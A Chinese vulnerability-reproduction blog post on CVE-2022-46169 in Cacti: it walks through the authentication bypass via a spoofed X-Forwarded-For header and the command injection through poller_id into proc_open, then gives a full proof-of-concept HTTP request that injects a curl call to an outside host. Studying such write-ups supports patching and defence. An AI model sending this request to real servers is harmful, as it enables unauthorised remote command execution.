漏洞复现-Cacti命令执行漏洞 (CVE-2022-46169)

1.漏洞描述

复制代码
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。
复制代码
该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。

2.影响版本

Cacti < 1.2.23

3.影响范围

4.漏洞分析

复制代码
我们先看补丁
复制代码
https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
复制代码
漏洞点主要存在于lib/functions.php、remote_agent.php
复制代码
分为登录绕过和命令注入

登录绕过

复制代码
我们先跟进 get_client_addr看看
复制代码
函数的作用是从 X-Forwarded-For等参数中获取值,filter_var 进行过滤,正确的地址就可以返回,X-Forwarded-For 参数可控,可以对其进行修改 
复制代码
接下来看remote_client_authorized函数的下半部分
复制代码
gethostbyaddr 对 client_addr 获取网络主机名,当 $client_name 与 $client_addr 不同时, 进入remote_agent_strip_domain 函数
复制代码
函数就是截取点号前面的值 大多数情况下,我们传进去的值为 127.0.0.1 时,就会返回 true 了 因此我们可以通过修改 X-Forwarded-For 来绕过这里的认证

命令注入

复制代码
我们先看一下修复记录
复制代码
跟进get_nfilter_request_var函数
复制代码
函数的作用是直接获取参数,没用过滤
复制代码
这里的 $local_data_ids也是传进来的值,可控。

接下来我们关注这里的 $items ,是从数据库的 poller_item 表中取出来的,默认为空。

接下来当 $items 有了数据并且他的成员中有一个 item 也是一个数组并且键为 action,值为 2 时,即可进入命令注入的漏洞所在

复制代码
在385 行有 proc_open可以命令执行。
复制代码
Poc:
复制代码
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+dnslog.cn` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5. 修复建议

官方已经提供修复的版本,直接 github 下载即可
https://github.com/Cacti/cacti

相关推荐
Black蜡笔小新8 分钟前
运维提效!视频汇聚平台EasyCVR视频质量诊断,掉线花屏自动预警
运维·安全·音视频
数据知道1 小时前
哈希与密码存储——bcrypt、Argon2、盐值与彩虹表
网络·算法·安全·网络安全·密码学·哈希算法
sbjdhjd1 小时前
从 assert 动态调用报错到临时文件链路:PHP 5.6 与 7.3 授权靶场中的短 payload 复盘 | (17字符绕过)
安全·网络安全·数据挖掘·开源·云计算·php·字符绕过
sbjdhjd1 小时前
从 7 字符文件名拼接到二维数组取值:PHP 无参函数限制下的受控靶场复盘 | (7字符绕过)
网络·nginx·安全·网络安全·云计算·php·apache
隐擎fox2 小时前
网络传输安全剖析:WebRTC 本地真实 IP 泄漏机制(STUN/TURN)与 Python 防护检测实战
网络·网络协议·tcp/ip·安全·webrtc
字节暗面2 小时前
SO 加固强度自查 Checklist:静态、加载链、运行时看哪几项
安全·逆向
GIS数据转换器2 小时前
遥感GIS一体化技术应用平台
大数据·人工智能·python·安全·数据挖掘
明航咨询-陈老师3 小时前
信息安全服务资质扫盲:CNITSEC 与 CCRC,两套国字号资质的完整对比(技术向)
网络·安全·web安全
乐迪信息4 小时前
航道船舶逆行AI识别,港口安全智能告警系统
大数据·前端·人工智能·安全·计算机视觉·音视频
Multipath7124 小时前
无人驾驶车的多链路聚合传输应用方案
网络·5g·安全·智能路由器·实时音视频